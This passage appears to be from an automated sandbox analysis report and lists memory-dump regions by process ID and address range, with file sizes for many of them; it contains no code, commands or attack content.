                                                                                                                                                                                                                                      • memory/1144-60-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1168-77-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1256-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1364-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1380-252-0x0000000004EC0000-0x0000000004F45000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        532KB

                                                                                                                                                                                                                                      • memory/1380-253-0x00000000064D0000-0x00000000064E5000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        84KB

                                                                                                                                                                                                                                      • memory/1464-227-0x00000000027E0000-0x00000000028E1000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                      • memory/1464-203-0x0000000000490000-0x0000000000500000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                      • memory/1536-68-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1568-64-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1576-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1580-229-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                      • memory/1580-228-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                      • memory/1604-214-0x0000000000110000-0x0000000000111000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/1604-196-0x0000000002610000-0x00000000027AC000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                      • memory/1604-215-0x00000000000F0000-0x0000000000102000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                      • memory/1604-208-0x0000000000EC0000-0x0000000000FAF000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        956KB

                                                                                                                                                                                                                                      • memory/1688-63-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1688-65-0x00000000776D0000-0x00000000776D1000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/1700-84-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1716-87-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1716-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1728-230-0x0000000002BD0000-0x0000000002C14000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        272KB

                                                                                                                                                                                                                                      • memory/1740-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1780-212-0x0000000004770000-0x0000000004771000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/1844-207-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        17.3MB

                                                                                                                                                                                                                                      • memory/1844-206-0x0000000002290000-0x0000000003392000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        17.0MB

                                                                                                                                                                                                                                      • memory/1848-81-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1856-213-0x0000000000980000-0x0000000000982000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/1888-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1960-241-0x0000000004680000-0x0000000004681000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2040-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2044-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2060-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2084-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2128-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2132-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2136-218-0x00000000008E0000-0x00000000008E2000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/2160-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2172-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2184-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2188-205-0x0000000000400000-0x0000000000983000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.5MB

                                                                                                                                                                                                                                      • memory/2200-242-0x0000000000400000-0x0000000000401000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2216-231-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        284KB

                                                                                                                                                                                                                                      • memory/2236-232-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.5MB

                                                                                                                                                                                                                                      • memory/2264-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2280-90-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2356-199-0x0000000000400000-0x000000000045C000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        368KB

                                                                                                                                                                                                                                      • memory/2356-198-0x0000000001E20000-0x0000000001F21000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                      • memory/2356-197-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/2360-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2408-93-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2656-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2672-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2676-255-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2676-256-0x0000000004A02000-0x0000000004A03000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2692-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2712-99-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2728-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2736-204-0x000000001B050000-0x000000001B052000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/2748-236-0x00000000003C0000-0x000000000041C000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        368KB

                                                                                                                                                                                                                                      • memory/2748-235-0x00000000009F0000-0x0000000000AF1000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                      • memory/2756-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2760-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2792-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2800-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2804-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2808-105-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2820-226-0x0000000002760000-0x00000000027A8000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        288KB

                                                                                                                                                                                                                                      • memory/2824-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2832-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2848-209-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        172KB

                                                                                                                                                                                                                                      • memory/2856-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2864-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2864-211-0x0000000004690000-0x0000000004691000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2872-210-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2884-223-0x00000000021A5000-0x00000000021A6000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2884-219-0x0000000002180000-0x0000000002182000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/2884-222-0x0000000002186000-0x00000000021A5000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        124KB

                                                                                                                                                                                                                                      • memory/2896-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2904-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2904-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2940-217-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/2952-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2964-185-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2968-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/2988-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3000-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3004-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3008-216-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        88KB

                                                                                                                                                                                                                                      • memory/3024-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3028-225-0x0000000000400000-0x0000000002BEA000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        39.9MB

                                                                                                                                                                                                                                      • memory/3028-224-0x0000000000220000-0x00000000002B1000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        580KB

                                                                                                                                                                                                                                      • memory/3028-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3032-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3044-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3048-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3056-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3064-233-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        7.0MB

                                                                                                                                                                                                                                      • memory/3064-239-0x00000000003E0000-0x0000000000400000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                      • memory/3068-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/3068-124-0x000007FEFBDA1000-0x000007FEFBDA3000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/3084-246-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        48KB

                                                                                                                                                                                                                                      • memory/3100-258-0x0000000004A52000-0x0000000004A53000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3100-257-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3156-243-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                      • memory/3156-244-0x00000000002F0000-0x0000000000302000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                      • memory/3224-250-0x0000000000220000-0x0000000000229000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                      • memory/3224-251-0x0000000000400000-0x0000000002BA3000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        39.6MB

                                                                                                                                                                                                                                      • memory/3256-247-0x0000000004640000-0x0000000004641000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3484-254-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3484-249-0x0000000004822000-0x0000000004823000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3484-248-0x0000000004820000-0x0000000004821000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4088-245-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        48KB